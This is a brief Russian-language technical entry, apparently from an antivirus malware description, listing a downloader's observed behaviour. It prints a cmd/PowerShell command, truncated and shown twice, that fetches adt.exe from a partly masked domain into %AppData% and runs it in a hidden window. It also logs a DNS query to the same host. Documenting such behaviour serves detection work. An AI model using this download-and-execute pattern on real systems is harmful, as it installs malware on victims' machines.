Техническая информация
- http://do#####are-cloud.com/adt.exe как %appdata+%\kgdrf.exe
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClient).DownloadFile('http://do#####are-cloud.com/adt.exe',$env:AppData+'\kGDRF.exe');(New-Object -com Shell.Application).ShellExecute($env:AppData+'\kGD...
- DNS ASK do#####are-cloud.com
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClient).DownloadFile('http://do#####are-cloud.com/adt.exe',$env:AppData+'\kGDRF.exe');(New-Object -com Shell.Application).ShellExecute($env:AppData+'\kGD...' (со скрытым окном)